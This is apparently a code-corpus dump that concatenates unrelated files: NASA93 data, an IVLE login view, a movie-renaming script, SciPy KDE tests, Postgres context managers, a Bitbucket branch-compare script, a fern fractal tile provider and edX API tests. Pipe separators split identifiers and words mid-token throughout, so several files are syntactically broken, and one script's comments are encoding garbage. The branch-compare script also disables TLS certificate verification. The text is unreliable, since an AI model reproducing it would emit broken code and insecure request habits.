[h,h,h,vh,l,n,l,n,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,111,600,4511,23.5],
[h,h,h,vh,l,h,vh,h,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,162,756,7553,32.4],
[h,h,h,vh,l,h,h,vh,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,352,1200,17597,42.9],
[h,h,h,vh,l,h,n,vh,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,165,97,7867,31.5],
[h,h,h,vh,h,h,n,vh,n,n,h,h,l,h,n,n,n,h,h,n,n,n,60,409,2004,24.9],
[h,h,h,vh,h,h,n,vh,n,n,h,h,l,h,n,n,n,h,h,n,n,n,100,703,3340,29.6],
[h,h,h,vh,n,h,vh,vh,n,n,xh,xh,h,n,n,n,n,l,l,n,n,n,32,1350,2984,33.6],
[h,h,h,vh,h,h,h,h,n,n,vh,xh,h,h,h,n,h,h,h,n,n,n,53,480,2227,28.8],
[h,h,h,vh,h,h,l,vh,n,n,vh,xh,l,vh,vh,n,vh,vl,vl,h,n,n,41,599,1594,23.0],
[h,h,h,vh,h,h,l,vh,n,n,vh,xh,l,vh,vh,n,vh,vl,vl,h,n,n,24,430,933,19.2],
[h,h,h,vh,h,vh,h,vh,n,n,xh,xh,n,h,h,n,h,h,h,n,n,n,165,4178.2,6266,47.3],
[h,h,h,vh,h,vh,h,vh,n,n,xh,xh,n,h,h,n,h,h,h,n,n,n,65,1772.5,2468,34.5],
[h,h,h,vh,h,vh,h,vh,n,n,xh,xh,n,h,h,n,h,h,h,n,n,n,70,1645.9,2658,35.4],
[h,h,h,vh,h,vh,h,xh,n,n,xh,xh,n,h,h,n,h,h,h,n,n,n,50,1924.5,2102,34.2],
[h,h,h,vh,l,vh,l,vh,n,n,vh,xh,l,h,n,n,l,vl,l,h,n,n,7.25,648,406,15.6],
[h,h,h,vh,h,vh,h,vh,n,n,xh,xh,n,h,h,n,h,h,h,n,n,n,233,8211,8848,53.1],
[h,h,h,vh,n,h,n,vh,n,n,vh,vh,h,n,n,n,n,l,l,n,n,n,16.3,480,1253,21.5],
[h,h,h,vh,n,h,n,vh,n,n,vh,vh,h,n,n,n,n,l,l,n,n,n, 6.2, 12,477,15.4],
[h,h,h,vh,n,h,n,vh,n,n,vh,vh,h,n,n,n,n,l,l,n,n,n, 3.0, 38,231,12.0],
])
"""
Demo code:
"""
def _nasa93(): print(nasa93.__name__)
#_nasa93()
#if __name__ == '__main__': eval(todo('_nasa93()'))
|
dcoles/ivle
|
ivle/webapp/security/views.py
|
Python
|
gpl-2.0
| 6,811 | 0.001175 |
# IVLE
# Copyright (C) 2007-2009 The University of Melbourne
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# Author: Will Grant, Nick Chadwick
import urllib
import datetime
try:
import mod_python.Cookie
except ImportError:
# This needs to be importable from outside Apache.
pass
import ivle.pulldown_subj
import ivle.webapp.security
from ivle.auth import authenticate, AuthError
from ivle.webapp.base.xhtml import XHTMLView
from ivle.webapp.base.plugins import CookiePlugin
class LoginView(XHTMLView):
'''A view to allow a user to log in.'''
template = 'login.html'
allow_overlays = False
def authorize(self, req):
return True
def populate(self, req, ctx):
fields = req.get_fieldstorage()
nexturl = fields.getfirst('url')
# XXX Warning that Internet Explorer is unsupported
# Test if the user is in Internet Explorer
try:
useragent = req.headers_in['User-Agent']
# A bit of very basic UA string detection
ctx['msie'] = ('MSIE' in useragent
and 'AppleWebKit' not in useragent
and 'Gecko' not in useragent
and 'Opera' not in useragent)
except KeyError:
ctx['msie'] = False
if nexturl is None:
nexturl = '/'
# We are already logged in. If it is a POST, they might be trying to
# clobber their session with some new credentials. That's their own
# business, so we let them do it. Otherwise, we don't bother prompting
# and just redirect to the destination.
# Note that req.user is None even if we are 'logged in', if the user is
# invalid (state != enabled, or expired).
if req.method != "POST" and req.user is not None:
req.throw_redirect(nexturl)
# Don't give any URL if we want /.
if nexturl == '/':
query_string = ''
else:
query_string = '?url=' + urllib.quote(nexturl, safe="/~")
ctx['path'] = req.make_path('+login') + query_string
# If this succeeds, the user is invalid.
user = ivle.webapp.security.get_user_details(req)
if user is not None:
if user.state == "no_agreement":
# Authenticated, but need to accept the ToS. Send them there.
# IMPORTANT NOTE FOR HACKERS: You can't simply disable this
# if you are not planning to display a ToS page - the ToS
# acceptance process actually calls usrmgt to create the user
# jai
|
ls and rela
|
ted stuff.
req.throw_redirect(req.make_path('+tos') + query_string)
elif user.state == "pending":
# FIXME: this isn't quite the right answer, but it
# should be more robust in the short term.
session = req.get_session()
session.invalidate()
session.delete()
user.state = u'no_agreement'
req.store.commit()
req.throw_redirect(nexturl)
if req.method == "POST":
# While req.user is normally set to get_user_details, it won't set
# it if the account isn't valid. So we get it ourselves.
user = ivle.webapp.security.get_user_details(req)
badlogin = None
username = fields.getfirst('user')
password = fields.getfirst('pass')
if username is not None:
# From this point onwards, we will be showing an error message
# if unsuccessful.
# Authenticate
if password is None:
badlogin = "No password supplied."
else:
user = None
try:
# Username is case insensitive
user = authenticate.authenticate(req.config, req.store,
username.value.lower(), password.value)
except AuthError, msg:
badlogin = msg
if user is None:
# Must have got an error. Do not authenticate.
# The except: above will have set a message.
pass
else:
# Success - Set the session and redirect to the URL.
session = req.get_session()
session['login'] = user.login
session.save()
session.unlock()
user.last_login = datetime.datetime.now()
# Create cookies for plugins that might request them.
for plugin in req.config.plugin_index[CookiePlugin]:
for cookie in plugin.cookies:
# The function can be None if they just need to be
# deleted at logout.
if plugin.cookies[cookie] is not None:
req.add_cookie(mod_python.Cookie.Cookie(cookie,
plugin.cookies[cookie](user), path='/'))
# Add any new enrolments.
ivle.pulldown_subj.enrol_user(req.config, req.store, user)
req.store.commit()
req.throw_redirect(nexturl)
# We didn't succeed.
# Render the login form with the error message.
ctx['error'] = badlogin
class LogoutView(XHTMLView):
'''A view to log the current session out.'''
template = 'logout.html'
allow_overlays = False
def authorize(self, req):
# This can be used by any authenticated user, even if they haven't
# accepted the ToS yet.
return ivle.webapp.security.get_user_details(req) is not None
def populate(self, req, ctx):
if req.method == "POST":
req.logout()
else:
ctx['path'] = req.make_path('+logout')
|
windcode/xtools
|
CleanMoviePrefix.py
|
Python
|
mit
| 1,426 | 0.019635 |
# coding=gbk
import os
import re
import string
def isMov(filename):
# ÅжÏÊÇ·ñΪµçÓ°Îļþ
suffix = filename.split('.')[-1].lower() # ÌáÈ¡ºó׺
pattern = re.compile(r'mpg|mpeg|m2v|mkv|dat|vob|avi|wmv|rm|ram|rmvb|mov|avi|mp4|qt|viv')
if pattern.search(suffix): # Æ¥ÅäÊÇ·ñΪµçÓ°¸ñʽ
return True
|
else:
return False
if __name__=='__main__':
# ±éÀúµ±Ç°Ä¿Â¼
print '´¦ÀíÖС¡'
cnt = 1
for fp in os.listdir(os.getcwd()):
if os.path.isfile(fp) and isMov(fp): # ÊǵçÓ°Îļþ
if fp[0]=='[': # È¥µô¿ªÍ·µÄ[]
index = fp.find(']')
if index!=-1:
print '[%d] %s ==> %s'%(cnt,fp,fp[index+1:])
|
os.rename(fp,fp[index+1:])
fp = fp[index+1:]
cnt+=1
elif fp[:2]=='¡¾': # È¥µô¿ªÍ·µÄ¡¾¡¿
index = fp.find('¡¿')
if index!=-1:
print '[%d] %s ==> %s'%(cnt,fp,fp[index+2:])
os.rename(fp,fp[index+2:])
fp = fp[index+2:]
cnt+=1
if fp[0] =='.' or fp[0]=='-': # È¥µô¿ªÍ·µÄ'.' »ò '-'
print '[%d] %s ==> %s'%(cnt,fp,fp[1:])
os.rename(fp,fp[1:])
if cnt==1:
print 'ûÓÐÐèÒª´¦ÀíµÄµçÓ°Îļþ'
else:
print '´¦ÀíÍê±Ï'
|
GbalsaC/bitnamiP
|
venv/lib/python2.7/site-packages/scipy/stats/tests/test_kdeoth.py
|
Python
|
agpl-3.0
| 6,021 | 0.000997 |
from __future__ import division, print_function, absolute_import
from scipy import stats
import numpy as np
from numpy.testing import assert_almost_equal, assert_, assert_raises, \
assert_array_almost_equal, assert_array_almost_equal_nulp, run_module_suite
def test_kde_1d():
#some basic tests comparing to normal distribution
np.random.seed(8765678)
n_basesample = 500
xn = np.random.randn(n_basesample)
xnmean = xn.mean()
xnstd = xn.std(ddof=1)
# get kde for original sample
gkde = stats.gaussian_kde(xn)
# evaluate the density function for the kde for some points
xs = np.linspace(-7,7,501)
kdepdf = gkde.evaluate(xs)
normpdf = stats.norm.pdf(xs, loc=xnmean, scale=xnstd)
intervall = xs[1] - xs[0]
assert_(np.sum((kdepdf - normpdf)**2)*intervall < 0.01)
prob1 = gkde.integrate_box_1d(xnmean, np.inf)
prob2 = gkde.integrate_box_1d(-np.inf, xnmean)
assert_almost_equal(prob1, 0.5, decimal=1)
assert_almost_equal(prob2, 0.5, decimal=1)
assert_almost_equal(gkde.integrate_box(xnmean, np.inf), prob1, decimal=13)
assert_almost_equal(gkde.integrate_box(-np.inf, xnmean), prob2, decimal=13)
assert_almost_equal(gkde.integrate_kde(gkde),
(kdepdf**2).sum()*intervall, decimal=2)
assert_almost_equal(gkde.integrate_gaussian(xnmean, xnstd**2),
(kdepdf*normpdf).sum()*intervall, decimal=2)
def test_kde_bandwidth_method():
def scotts_factor(kde_obj):
"""Same as default, just check that it works."""
return np.power(kde_obj.n, -1./(kde_obj.d+4))
np.random.seed(8765678)
n_basesample = 50
xn = np.random.randn(n_basesample)
# Default
gkde = stats.gaussian_kde(xn)
# Supply a callable
gkde2 = stats.gaussian_kde(xn, bw_method=scotts_factor)
# Supply a scalar
gkde3 = stats.gaussian_kde(xn, bw_method=gkde.factor)
xs = np.linspace(-7,7,51)
kdepdf = gkde.evaluate(xs)
kdepdf2 = gkde2.evaluate(xs)
assert_almost_equal(kdepdf, kdepdf2)
kdepdf3 = gkde3.evaluate(xs)
assert_almost_equal(kdepdf, kdepdf3)
assert_raises(ValueError, stats.gaussian_kde, xn, bw_method='wrongstring')
# Subclasses that should stay working (extracted from various sources).
# Unfortunately the earlier design of gaussian_kde made it necessary for users
# to create these kinds of subclasses, or call _compute_covariance() d
|
irectly.
class _kde_subclass1(stats.gaussian_kde):
def __init__(self, dataset):
self.dataset = np.atleast_2d(dataset)
self.d, self.n = self.dataset.shape
self.covariance_factor = self.scotts_factor
self._compute_covariance()
class _kde_subclass2(stats.gaussian_kde):
def __init__(self, dataset):
self.covariance_factor = self.scotts_factor
super(_kde_subclass2, self).__init__(dataset)
class _kde_subclass3(stats.gaussian_kde
|
):
def __init__(self, dataset, covariance):
self.covariance = covariance
stats.gaussian_kde.__init__(self, dataset)
def _compute_covariance(self):
self.inv_cov = np.linalg.inv(self.covariance)
self._norm_factor = np.sqrt(np.linalg.det(2*np.pi * self.covariance)) \
* self.n
class _kde_subclass4(stats.gaussian_kde):
def covariance_factor(self):
return 0.5 * self.silverman_factor()
def test_gaussian_kde_subclassing():
x1 = np.array([-7, -5, 1, 4, 5], dtype=np.float)
xs = np.linspace(-10, 10, num=50)
# gaussian_kde itself
kde = stats.gaussian_kde(x1)
ys = kde(xs)
# subclass 1
kde1 = _kde_subclass1(x1)
y1 = kde1(xs)
assert_array_almost_equal_nulp(ys, y1, nulp=10)
# subclass 2
kde2 = _kde_subclass2(x1)
y2 = kde2(xs)
assert_array_almost_equal_nulp(ys, y2, nulp=10)
# subclass 3
kde3 = _kde_subclass3(x1, kde.covariance)
y3 = kde3(xs)
assert_array_almost_equal_nulp(ys, y3, nulp=10)
# subclass 4
kde4 = _kde_subclass4(x1)
y4 = kde4(x1)
y_expected = [0.06292987, 0.06346938, 0.05860291, 0.08657652, 0.07904017]
assert_array_almost_equal(y_expected, y4, decimal=6)
# Not a subclass, but check for use of _compute_covariance()
kde5 = kde
kde5.covariance_factor = lambda: kde.factor
kde5._compute_covariance()
y5 = kde5(xs)
assert_array_almost_equal_nulp(ys, y5, nulp=10)
def test_gaussian_kde_covariance_caching():
x1 = np.array([-7, -5, 1, 4, 5], dtype=np.float)
xs = np.linspace(-10, 10, num=5)
# These expected values are from scipy 0.10, before some changes to
# gaussian_kde. They were not compared with any external reference.
y_expected = [0.02463386, 0.04689208, 0.05395444, 0.05337754, 0.01664475]
# Set the bandwidth, then reset it to the default.
kde = stats.gaussian_kde(x1)
kde.set_bandwidth(bw_method=0.5)
kde.set_bandwidth(bw_method='scott')
y2 = kde(xs)
assert_array_almost_equal(y_expected, y2, decimal=7)
def test_gaussian_kde_monkeypatch():
"""Ugly, but people may rely on this. See scipy pull request 123,
specifically the linked ML thread "Width of the Gaussian in stats.kde".
If it is necessary to break this later on, that is to be discussed on ML.
"""
x1 = np.array([-7, -5, 1, 4, 5], dtype=np.float)
xs = np.linspace(-10, 10, num=50)
# The old monkeypatched version to get at Silverman's Rule.
kde = stats.gaussian_kde(x1)
kde.covariance_factor = kde.silverman_factor
kde._compute_covariance()
y1 = kde(xs)
# The new saner version.
kde2 = stats.gaussian_kde(x1, bw_method='silverman')
y2 = kde2(xs)
assert_array_almost_equal_nulp(y1, y2, nulp=10)
def test_kde_integer_input():
"""Regression test for #1181."""
x1 = np.arange(5)
kde = stats.gaussian_kde(x1)
y_expected = [0.13480721, 0.18222869, 0.19514935, 0.18222869, 0.13480721]
assert_array_almost_equal(kde(x1), y_expected, decimal=6)
if __name__ == "__main__":
run_module_suite()
|
gratipay/postgres.py
|
postgres/context_managers.py
|
Python
|
mit
| 5,280 | 0.001136 |
from psycopg2 import InterfaceError
class CursorContextManager:
"""Instantiated once per :func:`~postgres.Postgres.get_cursor` call.
:param pool: see :mod:`psycopg2_pool`
:param bool autocommit: see :attr:`psycopg2:connection.autocommit`
:param bool readonly: see :attr:`psycopg2:connection.readonly`
:param cursor_kwargs: passed to :meth:`psycopg2:connection.cursor`
During construction, a connection is checked out of the connection pool
and its :attr:`autocommit` and :attr:`readonly` attributes are set, then a
:class:`psycopg2:cursor` is created from that connection.
Upon exit of the ``with`` block, the connection is rolled back if an
exception was raised, or committed otherwise. There are two exceptions to
this:
1. if :attr:`autocommit` is :obj:`True`, then the connection is neither
rolled back nor committed;
2. if :attr:`readonly` is :obj:`True`, then the connection is always rolled
back, never committed.
In all cases the cursor is closed and the connection is put back in the pool.
"""
__slots__ = ('pool', 'conn', 'cursor')
def __init__(self, pool, autocommit=False, readonly=False, **cursor_kwargs):
self.pool = pool
conn = self.pool.getconn()
conn.autocommit = autocommit
conn.readonly = readonly
self.cursor = conn.cursor(**cursor_kwargs)
self.conn = conn
def __enter__(self):
return self.cursor
def __exit__(self, exc_type, exc_val, exc_tb):
"""Put our connection back in the pool.
"""
self.cursor.close()
self.conn.__exit__(exc_type, exc_val, exc_tb)
self.pool.putconn(self.conn)
class ConnectionCursorContextManager:
"""Creates a cursor from the given connection, then wraps it in a context
manager that automatically commits or rolls back the changes on exit.
:param conn: a :class:`psycopg2:connection`
:param bool autocommit: see :attr:`psycopg2:connection.autocommit`
:param bool readonly: see :attr:`psycopg2:connection.readonly`
:param cursor_kwargs: passed to :meth:`psycopg2:connection.cursor`
During construction, the connection's :attr:`autocommit` and :attr:`readonly`
attributes are set, then :meth:`psycopg2:connection.cursor` is called with
`cursor_kwargs`.
Upon exit of the ``with`` block, the connection is rolled back if an
exception was raised, or committed otherwise. There are two exceptions to
this:
1. if :attr:`autocomm
|
it` is :obj:`True`, then the connection is neither
rolled back nor committed;
2. if :attr:`readonly` is :obj:`True`, then the connection is always rolled
back, never committed.
In all cases the cursor is closed.
"""
__slots__ = ('conn', 'cursor')
def __init__(self, conn, autocommit=False, readonly=False, **cursor_kwargs):
conn.autocommit = autocommit
conn.readonly = readonly
self.conn = conn
self.cursor = conn.cursor(**cursor_kwargs)
|
def __enter__(self):
return self.cursor
def __exit__(self, exc_type, exc_val, exc_tb):
self.cursor.close()
self.conn.__exit__(exc_type, exc_val, exc_tb)
class CursorSubcontextManager:
"""Wraps a cursor so that it can be used for a subtransaction.
See :meth:`~postgres.Postgres.get_cursor` for an explanation of subtransactions.
:param cursor: the :class:`psycopg2:cursor` to wrap
:param back_as: temporarily overwrites the cursor's
:attr:`~postgres.cursors.SimpleCursorBase.back_as` attribute
"""
__slots__ = ('cursor', 'back_as', 'outer_back_as')
PRESERVE = object()
def __init__(self, cursor, back_as=PRESERVE):
self.cursor = cursor
self.back_as = back_as
def __enter__(self):
if self.back_as is not self.PRESERVE:
self.outer_back_as = self.cursor.back_as
self.cursor.back_as = self.back_as
return self.cursor
def __exit__(self, exc_type, exc_val, exc_tb):
if self.back_as is not self.PRESERVE:
self.cursor.back_as = self.outer_back_as
class ConnectionContextManager:
"""Instantiated once per :func:`~postgres.Postgres.get_connection` call.
:param pool: see :mod:`psycopg2_pool`
:param bool autocommit: see :attr:`psycopg2:connection.autocommit`
:param bool readonly: see :attr:`psycopg2:connection.readonly`
This context manager checks out a connection out of the specified pool, sets
its :attr:`autocommit` and :attr:`readonly` attributes.
The :meth:`__enter__` method returns the :class:`~postgres.Connection`.
The :meth:`__exit__` method rolls back the connection and puts it back in
the pool.
"""
__slots__ = ('pool', 'conn')
def __init__(self, pool, autocommit=False, readonly=False):
self.pool = pool
conn = self.pool.getconn()
conn.autocommit = autocommit
conn.readonly = readonly
self.conn = conn
def __enter__(self):
return self.conn
def __exit__(self, *exc_info):
"""Put our connection back in the pool.
"""
try:
self.conn.rollback()
except InterfaceError:
pass
self.pool.putconn(self.conn)
|
gwsu2008/automation
|
python/git-branch-diff.py
|
Python
|
gpl-2.0
| 3,650 | 0.001644 |
#!/usr/bin/env python3
import urllib3
import sys
import os
import json
from datetime import datetime
import urllib.parse
import requests
import time
import argparse
urllib3.disable_warnings()
debug = os.getenv('DEBUG', 0)
batch_size = 100
workspace = os.getenv('WORKSPACE', os.getcwd())
user_name = 'jenkins-testerdh'
user_password = os.getenv('JENKINS_PASSWD', "None")
def json_serial(obj):
if isinstance(obj, datetime):
serial = obj.isoformat()
return serial
raise TypeError("Type not serializable")
def json_print(json_obj):
return json.dumps(json_obj, indent=4, sort_keys=True, default=json_serial)
def request_get(url):
r = requests.get(url, auth=(user_name, user_password), verify=False)
return r
def info(msg):
print('\033[34m[Info]\033[0m {}'.format(msg))
return
def warn(msg):
print('\033[33m[Warn]\033[0m {}'.format(msg))
sys.exit(1)
def error(msg):
print('\033[31m[Error]\033[0m {}'.format(msg))
sys.exit(1)
def parse_args():
parser = argparse.ArgumentParser(description='Compare dev and master branch.')
parser.add_argument('--repo-url', '-r',
|
default=None, dest='
|
repo_url', help='Git clone URL with ssh syntax')
args, unknown = parser.parse_known_args()
return args, unknown
def main(argv):
start_time = time.time()
args, unknown = parse_args()
info('Starting')
info('Workspace {}'.format(workspace))
master_merge_file = '{}/merge.master'.format(workspace)
from_dev = urllib.parse.quote_plus('refs/heads/dev')
to_master = urllib.parse.quote_plus('refs/heads/master')
project_url = None
if args.repo_url is None:
error('--repo-url is not defined.')
return 1
try:
git_host = args.repo_url.split('@')[1]
git_url = 'https://{}/rest/api/1.0/projects'.format(git_host.split(':')[0])
project_key = args.repo_url.split('/')[3]
repo_name = args.repo_url.split('/')[-1:][0]
repo_name = repo_name.replace('.git', '')
project_url = '{}/{}/repos/{}'.format(git_url, project_key, repo_name)
if debug == 1:
info(project_url)
except IndexError:
error('Git clone repo url unknown format.')
response = request_get(project_url)
if int(response.status_code) == 200:
if 'id' in response.json():
repo_id = response.json()['id']
else:
error('Repository ID not found.')
error(response.json())
return 1
else:
error('HTTP error {}'.format(response.status_code))
return 1
compare_branch = 'compare/commits?from={}&to={}&fromRepo={}&limit=1'.format(from_dev, to_master, repo_id)
compare_url = '{}/{}'.format(project_url, compare_branch)
if debug == 1:
info(compare_url)
response = request_get(compare_url)
if int(response.status_code) == 200:
if debug == 1:
info('Headers: {}'.format(dict(response.headers)))
info('Encoding: {}'.format(response.encoding))
info('Text: {}'.format(response.json()))
change_size = response.json()['size']
if change_size == 0:
info('{} has no change between branch dev and master'.format(args.repo_url))
else:
info('{} changes between branch dev and master'.format(args.repo_url))
master_merge_fh = open(master_merge_file, 'w')
master_merge_fh.close()
else:
error('HTTP error {}'.format(response.status_code))
info('Finished - execution time %.2f seconds' % (time.time() - start_time))
return
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
davidar/pyzui
|
pyzui/ferntileprovider.py
|
Python
|
gpl-2.0
| 4,684 | 0.009821 |
## PyZUI 0.1 - Python Zooming User Interface
## Copyright (C) 2009 David Roberts <d@vidr.cc>
##
## This program is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License
## as published by the Free Software Foundation; either version 2
## of the License, or (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
## 02110-1301, USA.
"""Dynamic tile provider for Barnsley's fern."""
import random
import Image
from dynamictileprovider import DynamicTileProvider
class FernTileProvider(DynamicTileProvider):
"""FernTileProvider objects are used for generating tiles of Barnsley's
fern iterated function system.
Constructor: FernTileProvider(TileCache)
"""
def __init__(self, tilecache):
DynamicTileProvider.__init__(self, tilecache)
filext = 'png'
tilesize = 256
aspect_ratio = 1.0
max_iterations = 50000
max_points = 10000
transformations = [
## (probability, (a, b, c, d, e, f))
## x_n+1 = a*x_n + b*y_n + c
## y_n+1 = d*x_n + e*y_n + f
## for details about the transformations, see:
## <http://en.wikipedia.org/wiki/Barnsley's_fern>
## <http://books.google.com/books?id=oh7NoePgmOIC
## &printsec=frontcover#PPA86,M1>
## <http://mathworld.wolfram.com/BarnsleysFern.html>
## <http://www.home.aone.net.au/~byzantium/ferns/fractal.html>
## rachis
(0.01, ( 0.00, 0.00, 0.00, 0.00, 0.16, 0.00)),
## left hand first pinna
(0.07, ( 0.20, -0.26, 0.00, 0.23, 0.22, 1.60)),
## right hand first pinna
(0.07, (-0.15, 0.28, 0.00, 0.26, 0.24, 0.44)),
## body of fern
(0.85, ( 0.85, 0.04, 0.00, -0.04, 0.85, 1.60)),
]
color = (100, 170, 0)
def __choose_transformation(self):
"""Randomly choose a transformation based on the probability of each
transformation being chosen.
__choose_transformation() -> tuple<float,float,float,float,float,float>
"""
n = random.uniform(0,1)
for probability, transformation in self.transformations:
if n <= probability:
break
else:
n -= probability
return transformation
def __transform(self, x, y):
"""Randomly choose a transformation and apply it to x and y, returning
the result as a tuple.
__transform(float, float) -> tuple<float,float>
"""
t = self.__choose_transformation()
x_new = t[0]*x + t[1]*y + t[2]
y_new = t[3]*x + t[4]*y + t[5]
return (x_new,y_new)
def __draw_point(self, tile, x, y,
|
tilesize_units):
"""Draw the given point on the given tile.
__draw_point(Image, float, float, float) -> None
Precondition: 0.0 <= x <= tilesize_units
Precondition: 0.0 <
|
= y <= tilesize_units
"""
x = x * self.tilesize / tilesize_units
x = min(int(x), self.tilesize-1)
y = y * self.tilesize / tilesize_units
y = min(int(self.tilesize - y), self.tilesize-1)
tile.putpixel((x,y), self.color)
def _load_dynamic(self, tile_id, outfile):
media_id, tilelevel, row, col = tile_id
if row < 0 or col < 0 or \
row > 2**tilelevel - 1 or col > 2**tilelevel - 1:
## row,col out of range
return
tilesize_units = 10.0 * 2**-tilelevel
x = col * tilesize_units
y = row * tilesize_units
## the corners of the tile are:
## (x1,y2) +----+ (x2,y2)
## | |
## (x1,y1) +----+ (x2,y1)
x1 = x - 5.0
y2 = 10.0 - y
x2 = x1 + tilesize_units
y1 = y2 - tilesize_units
tile = Image.new('RGB', (self.tilesize,self.tilesize))
num_points = 0
x = 0.0
y = 0.0
for i in xrange(self.max_iterations):
if x1 <= x <= x2 and y1 <= y <= y2:
self.__draw_point(
tile, x-x1, y-y1, tilesize_units)
num_points += 1
if num_points > self.max_points:
break
x,y = self.__transform(x,y)
tile.save(outfile)
|
olexiim/edx-platform
|
lms/djangoapps/mobile_api/users/tests.py
|
Python
|
agpl-3.0
| 9,422 | 0.002972 |
"""
Tests for users API
"""
import datetime
from django.utils import timezone
from xmodule.modulestore.tests.factories import ItemFactory, CourseFactory
from xmodule.modulestore.django import modulestore
from student.models import CourseEnrollment
from .. import errors
from ..testutils import MobileAPITestCase, MobileAuthTestMixin, MobileAuthUserTestMixin, MobileEnrolledCourseAccessTestMixin
from .serializers import CourseEnrollmentSerializer
class TestUserDetailApi(MobileAPITestCase, MobileAuthUserTestMixin):
"""
Tests for /api/mobile/v0.5/users/<user_name>...
"""
REVERSE_INFO = {'name': 'user-detail', 'params': ['username']}
def test_success(self):
self.login()
response = self.api_response()
self.assertEqual(response.data['username'], self.user.username)
self.assertEqual(response.data['email'], self.user.email)
class TestUserInfoApi(MobileAPITestCase, MobileAuthTestMixin):
"""
Tests for /api/mobile/v0.5/my_user_info
"""
def reverse_url(self, reverse_args=None, **kwargs):
return '/api/mobile/v0.5/my_user_info'
def test_success(self):
"""Verify the endpoint redirects to the user detail endpoint"""
self.login()
response = self.api_response(expected_response_code=302)
self.assertTrue(self.username in response['location'])
class TestUserEnrollmentApi(MobileAPITestCase, MobileAuthUserTestMixin, MobileEnrolledCourseAccessTestMixin):
"""
Tests for /api/mobile/v0.5/users/<user_name>/course_enrollments/
"""
REVERSE_INFO = {'name': 'courseenrollment-detail', 'params': ['username']}
ALLOW_ACCESS_TO_UNRELEASED_COURSE = True
def verify_success(self, response):
super(TestUserEnrollmentApi, self).verify_success(response)
courses = response.data
self.assertEqual(len(courses), 1)
found_course = courses[0]['course']
self.assertTrue('video_outline' in found_course)
self.assertTrue('course_handouts' in found_course)
self.assertEqual(found_course['id'], unicode(self.course.id))
self.assertEqual(courses[0]['mode'], 'honor')
def verify_failure(self, response):
self.assertEqual(response.status_code, 200)
courses = response.data
self.assertEqual(len(courses), 0)
def test_sort_order(self):
self.login()
num_courses = 3
courses = []
for course_num in range(num_courses):
courses.append(CourseFactory.create(mobile_available=True))
self.enroll(courses[course_num].id)
# verify courses are returned in the order of enrollment, with most recently enrolled first.
response = self.api_response()
for course_num in range(num_courses):
self.assertEqual(
response.data[course_num]['course']['id'], # pylint: disable=no-member
unicode(courses[num_courses - course_num - 1].id)
)
class CourseStatusAPITestCase(MobileAPITestCase):
"""
Base test class for /api/mobile/v0.5/users/<user_name>/course_status_info/{course_id}
"""
REVERSE_INFO = {'name': 'user-course-status', 'params': ['username', 'course_id']}
def _setup_course_skeleton(self):
"""
Creates a basic course structure for our course
"""
section = ItemFactory.create(
parent_location=self.course.location,
)
sub_section = ItemFactory.create(
parent_location=section.location,
)
unit = ItemFactory.create(
parent_location=sub_section.location,
)
other_unit = ItemFactory.create(
parent_location=sub_section.location,
)
return section, sub_section, unit, other_unit
class TestCourseStatusGET(CourseStatusAPITestCase, MobileAuthUserTestMixin, MobileEnrolledCourseAccessTestMixin):
"""
Tests for GET of /api/mobile/v0.5/users/<user_name>/course_status_info/{course_id}
"""
def test_success(self):
self.login_and_enroll()
(section, sub_section, unit, __) = self._setup_course_skeleton()
response = self.api_response()
self.assertEqual(response.data["last_visited_module_id"], unicode(unit.location))
self.assertEqual(
response.data["last_visited_module_path"],
[unicode(module.location) for module in [unit, sub_section, section, self.course]]
)
class TestCourseStatusPATCH(CourseStatusAPITestCase, MobileAuthUserTestMixin, MobileEnrolledCourseAccessTestMixin):
"""
Tests for PATCH of /api/mobile/v0.5/users/<user_name>/course_status_info/{course_id}
"""
def url_method(self, url, **kwargs):
# override implementation to use PATCH method.
return self.client.patch(url, data=kwargs.get('data', None)) # pylint: disable=no-member
def test_success(self):
self.login_and_enroll()
(__, __, __, other_unit) = self._setup_course_skeleton()
response = self.api_response(data={"last_visited_module_id": unicode(other_unit.location)})
self.assertEqual(response.data["last_visited_module_id"], unicode(other_unit.location))
def test_invalid_module(self):
self.login_and_enroll()
response = self.api_response(data={"last_visited_module_id": "abc"}, expected_response_code=400)
self.assertEqual(response.data, errors.ERROR_INVALID_MODULE_ID)
def test_nonexistent_module(self):
self.login_and_enroll()
non_existent_key = self.course.id.make_usage_key('video', 'non-existent')
response = self.api_response(data={"last_visited_module_id": non_existent_key}, expected_response_code=400)
self.assertEqual(response.data, errors.ERROR_INVALID_MODULE_ID)
def test_no_timezone(self):
self.logi
|
n_and_enroll()
(__, __, __, other_unit) = self._setup_course_skeleton()
past_date = datetime.datetime.now()
response = self.api_response(
data={
"last_visited_module_id": unicode(other_unit.location),
|
"modification_date": past_date.isoformat() # pylint: disable=maybe-no-member
},
expected_response_code=400
)
self.assertEqual(response.data, errors.ERROR_INVALID_MODIFICATION_DATE)
def _date_sync(self, date, initial_unit, update_unit, expected_unit):
"""
Helper for test cases that use a modification to decide whether
to update the course status
"""
self.login_and_enroll()
# save something so we have an initial date
self.api_response(data={"last_visited_module_id": unicode(initial_unit.location)})
# now actually update it
response = self.api_response(
data={
"last_visited_module_id": unicode(update_unit.location),
"modification_date": date.isoformat()
}
)
self.assertEqual(response.data["last_visited_module_id"], unicode(expected_unit.location))
def test_old_date(self):
self.login_and_enroll()
(__, __, unit, other_unit) = self._setup_course_skeleton()
date = timezone.now() + datetime.timedelta(days=-100)
self._date_sync(date, unit, other_unit, unit)
def test_new_date(self):
self.login_and_enroll()
(__, __, unit, other_unit) = self._setup_course_skeleton()
